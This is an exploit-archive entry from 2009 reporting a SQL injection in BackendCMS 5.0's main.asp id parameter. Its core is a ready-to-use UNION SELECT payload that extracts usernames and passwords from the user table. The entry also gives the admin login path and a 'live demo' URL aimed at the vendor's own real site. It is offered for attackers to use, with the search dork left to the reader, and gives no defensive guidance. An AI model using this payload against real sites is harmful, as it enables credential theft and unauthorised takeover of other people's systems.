[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BackendCMS 5.0 (main.asp id) SQL Injection Vulnerability
# Published : 2009-04-09
# Author : AnGeL25dZ
# Previous Title : Exjune Guestbook v2 Remote Database Disclosure Exploit
# Next Title : Limbo CMS 1.0.4.2 CSRF Privilege Escalation PoC


************************************************************
** 	BackendCMS Version 5.0 SQl Injection
************************************************************
**  Prodcut:		BackendCMS Version 5.0  
**  Home   : 		http://www.backendcms.dk/
**  Vunlerability :	SQL Injection 
**  Dork : 		find it yourself
**			
************************************************************
** Discovred by:	AnGeL25dZ
** Contact     : 	angel25dz@gmail.com	
** *********************************************************
** Greetz to :	 ALLAH 
**		 All Members of HackTeach
**		 All Members of http://islam-attack.com
**		 ra3ch and all my friends ...MOC 
** 		 
*************************************************************
******************** SQL Injection **************************
************************************************************* 
** Exploit:  http://[PATH]/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user
**  
** Administration Login : http://[path]/admin/
** PS: the number of columns can be different from one site to another
**  
****************************************************************
** Live demo : http://www.backendcms.dk/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user

# www.Syue.com [2009-04-09]